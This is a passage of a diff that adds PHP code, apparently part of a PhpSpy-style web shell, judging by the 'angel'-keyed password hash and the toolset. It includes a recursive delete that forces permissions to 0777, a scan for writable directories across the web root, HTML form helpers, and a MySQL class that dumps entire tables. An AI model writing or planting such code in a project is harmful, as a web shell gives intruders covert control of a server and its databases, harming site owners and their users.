elseif(is_file($c.$f)) { + copy($c.$f, $d.$f); + } +} +// 删除目录 +function deltree($deldir) { + $dirs = @scandir($deldir); + if ($dirs) { + $dirs = array_diff($dirs, array('..', '.')); + foreach ($dirs as $file) { + if((is_dir($deldir.'/'.$file))) { + @chmod($deldir.'/'.$file,0777); + deltree($deldir.'/'.$file); + } else { + @chmod($deldir.'/'.$file,0777); + @unlink($deldir.'/'.$file); + } + } + @chmod($deldir,0777); + return @rmdir($deldir) ? 1 : 0; + } else { + return 0; + } +} + +// 表格行间的背景色替换 +function bg() { + global $bgc; + return ($bgc++%2==0) ? 'alt1' : 'alt2'; +} + +function cmp($a, $b) { + global $sort; + if(is_numeric($a[$sort[0]])) { + return (($a[$sort[0]] < $b[$sort[0]]) ? -1 : 1)*($sort[1]?1:-1); + } else { + return strcmp($a[$sort[0]], $b[$sort[0]])*($sort[1]?1:-1); + } +} + +// 获取当前目录的上级目录 +function getUpPath($cwd) { + $pathdb = explode('/', $cwd); + $num = count($pathdb); + if ($num > 2) { + unset($pathdb[$num-1],$pathdb[$num-2]); + } + $uppath = implode('/', $pathdb).'/'; + $uppath = str_replace('//', '/', $uppath); + return $uppath; +} + +// 检查PHP配置参数 +function getcfg($varname) { + $result = get_cfg_var($varname); + if ($result == 0) { + return 'No'; + } elseif ($result == 1) { + return 'Yes'; + } else { + return $result; + } +} + +// 获得文件扩展名 +function getext($file) { + $info = pathinfo($file); + return $info['extension']; +} +function GetWDirList($path){ + global $dirdata,$j,$web_cwd; + !$j && $j=1; + $dirs = @scandir($path); + if ($dirs) { + $dirs = array_diff($dirs, array('..','.')); + foreach ($dirs as $file) { + $f=str_replace('//','/',$path.'/'.$file); + if(is_dir($f)){ + if (is_writable($f)) { + $dirdata[$j]['filename']='/'.str_replace($web_cwd,'',$f); + $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $dirdata[$j]['chmod']=getChmod($f); + $dirdata[$j]['perm']=PermsColor($f); + $dirdata[$j]['owner']=getUser($f); + $dirdata[$j]['link']=$f; + $j++; + } + GetWDirList($f); + } + } + return $dirdata; + } else { + return array(); + } +} +function sizecount($size) { + $unit = array('Bytes', 'KB', 'MB', 'GB', 'TB','PB'); + for ($i = 0; $size >= 1024 && $i < 5; $i++) { + $size /= 1024; + } + return round($size, 2).' '.$unit[$i]; +} +function p($str){ + echo $str."\n"; +} + +function makehide($name,$value=''){ + p(""); +} + +function makeinput($arg = array()){ + $arg['size'] = isset($arg['size']) && $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; + $arg['type'] = isset($arg['type']) ? $arg['type'] : 'text'; + $arg['title'] = isset($arg['title']) ? $arg['title'].'
' : ''; + $arg['class'] = isset($arg['class']) ? $arg['class'] : 'input'; + $arg['name'] = isset($arg['name']) ? $arg['name'] : ''; + $arg['value'] = isset($arg['value']) ? $arg['value'] : ''; + if (isset($arg['newline'])) p('

'); + p("$arg[title]"); + if (isset($arg['newline'])) p('

'); +} + +function makeselect($arg = array()){ + $onchange = isset($arg['onchange']) ? 'onchange="'.$arg['onchange'].'"' : ''; + $arg['title'] = isset($arg['title']) ? $arg['title'] : ''; + $arg['name'] = isset($arg['name']) ? $arg['name'] : ''; + p("$arg[title] "); +} +function formhead($arg = array()) { + !isset($arg['method']) && $arg['method'] = 'post'; + !isset($arg['name']) && $arg['name'] = 'form1'; + $arg['extra'] = isset($arg['extra']) ? $arg['extra'] : ''; + $arg['onsubmit'] = isset($arg['onsubmit']) ? "onsubmit=\"$arg[onsubmit]\"" : ''; + p("
"); + if (isset($arg['title'])) { + p('

'.$arg['title'].' »

'); + } +} + +function maketext($arg = array()){ + $arg['title'] = isset($arg['title']) ? $arg['title'].'
' : ''; + $arg['name'] = isset($arg['name']) ? $arg['name'] : ''; + p("

$arg[title]

"); +} + +function formfooter($name = ''){ + !$name && $name = 'submit'; + p('

'); + p('
'); +} + +function goback(){ + global $cwd, $charset; + p('

'); +} + +function formfoot(){ + p(''); +} + +function encode_pass($pass) { + $k = 'angel'; + $pass = md5($k.$pass); + $pass = md5($pass.$k); + $pass = md5($k.$pass.$k); + return $pass; +} + +function pr($a) { + p('
'.print_r($a).'
'); +} + +class DB_MySQL { + + var $querycount = 0; + var $link; + var $charsetdb = array(); + var $charset = ''; + + function connect($dbhost, $dbuser, $dbpass, $dbname='') { + @ini_set('mysql.connect_timeout', 5); + if(!$this->link = @mysql_connect($dbhost, $dbuser, $dbpass, 1)) { + $this->halt('Can not connect to MySQL server'); + } + if($this->version() > '4.1') { + $this->setcharset($this->charset); + } + $dbname && mysql_select_db($dbname, $this->link); + } + function setcharset($charset) { + if ($charset && $this->charsetdb[$charset]) { + if(function_exists('mysql_set_charset')) { + mysql_set_charset($this->charsetdb[$charset], $this->link); + } else { + $this->query("SET character_set_connection='".$this->charsetdb[$charset]."', character_set_results='".$this->charsetdb[$charset]."', character_set_client=binary"); + } + } + } + function select_db($dbname) { + return mysql_select_db($dbname, $this->link); + } + function geterrdesc() { + return (($this->link) ? mysql_error($this->link) : mysql_error()); + } + function geterrno() { + return intval(($this->link) ? mysql_errno($this->link) : mysql_errno()); + } + function fetch($query, $result_type = MYSQL_ASSOC) { //MYSQL_NUM + return mysql_fetch_array($query, $result_type); + } + function query($sql) { + //echo '

'.$sql.'

'; + if(!($query = mysql_query($sql, $this->link))) { + $this->halt('MySQL Query Error', $sql); + } + $this->querycount++; + return $query; + } + function query_res($sql) { + $res = ''; + if(!$res = mysql_query($sql, $this->link)) { + $res = 0; + } else if(is_resource($res)) { + $res = 1; + } else { + $res = 2; + } + $this->querycount++; + return $res; + } + function num_rows($query) { + $query = mysql_num_rows($query); + return $query; + } + function num_fields($query) { + $query = mysql_num_fields($query); + return $query; + } + function affected_rows() { + return mysql_affected_rows($this->link); + } + function result($query, $row) { + $query = mysql_result($query, $row); + return $query; + } + function free_result($query) { + $query = mysql_free_result($query); + return $query; + } + function version() { + return mysql_get_server_info($this->link); + } + function close() { + return mysql_close($this->link); + } + function halt($msg =''){ + echo "

".htmlspecialchars($msg)."

\n"; + echo "

Mysql error description: ".htmlspecialchars($this->geterrdesc())."

\n"; + echo "

Mysql error number: ".$this->geterrno()."

\n"; + exit; + } + function get_fields_meta($result) { + $fields = array(); + $num_fields = $this->num_fields($result); + for ($i = 0; $i < $num_fields; $i++) { + $field = mysql_fetch_field($result, $i); + $fields[] = $field; + } + return $fields; + } + function sqlAddSlashes($s = ''){ + $s = str_replace('\\', '\\\\', $s); + $s = str_replace('\'', '\'\'', $s); + return $s; + } + // 备份数据库 + function sqldump($table, $fp=0) { + $crlf = (IS_WIN ? "\r\n" : "\n"); + $search = array("\x00", "\x0a", "\x0d", "\x1a"); //\x08\\x09, not required + $replace = array('\0', '\n', '\r', '\Z'); + + if (isset($this->charset) && isset($this->charsetdb[$this->charset])) { + $set_names = $this->charsetdb[$this->charset]; + } else { + $set_names = $this->charsetdb['utf-8']; + } + $tabledump = 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'.$crlf.$crlf; + $tabledump .= '/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;'.$crlf + . '/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;'.$crlf + . '/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;'.$crlf + . '/*!40101 SET NAMES ' . $set_names . ' */;'.$crlf.$crlf; + + $tabledump .= "DROP TABLE IF EXISTS `$table`;".$crlf; + $res = $this->query("SHOW CREATE TABLE $table"); + $create = $this->fetch($res, MYSQL_NUM); + $tabledump .= $create[1].';'.$crlf.$crlf; + if (strpos($tabledump, "(\r\n ")) { + $tabledump = str_replace("\r\n", $crlf, $tabledump); + } elseif (strpos($tabledump, "(\n ")) { + $tabledump = str_replace("\n", $crlf, $tabledump); + } elseif (strpos($tabledump, "(\r ")) { + $tabledump = str_replace("\r", $crlf, $tabledump); + } + unset($create); + + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + $tabledump = ''; + $rows = $this->query("SELECT * FROM $table"); + $fields_cnt = $this->num_fields($rows); + $fields_meta = $this->get_fields_meta($rows); + + while ($row = $this->fetch($rows, MYSQL_NUM)) { + for ($j = 0; $j < $fields_cnt; $j++) { + if (!isset($row[$j]) || is_null($row[$j])) { + $values[] = 'NULL'; + } elseif ($fields_meta[$j]->numeric && $fields_meta[$j]->type != 'timestamp' && !$fields_meta[$j]->blob) { + $values[] = $row[$j]; + } elseif ($fields_meta[$j]->blob) { + if (empty($row[$j]) && $row[$j] != '0') { + $values[] = '\'\''; + } else { + $values[] = '0x'.bin2hex($row[$j]); + } + } else { + $values[] = '\''.str_replace($search, $replace, $this->sqlAddSlashes($row[$j])).'\''; + } + } + $tabledump = 'INSERT INTO `'.$table.'` VALUES('.implode(', ', $values).');'.$crlf; + unset($values); + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + } + $this->free_result($rows); + } +} +?> \ No newline at end of file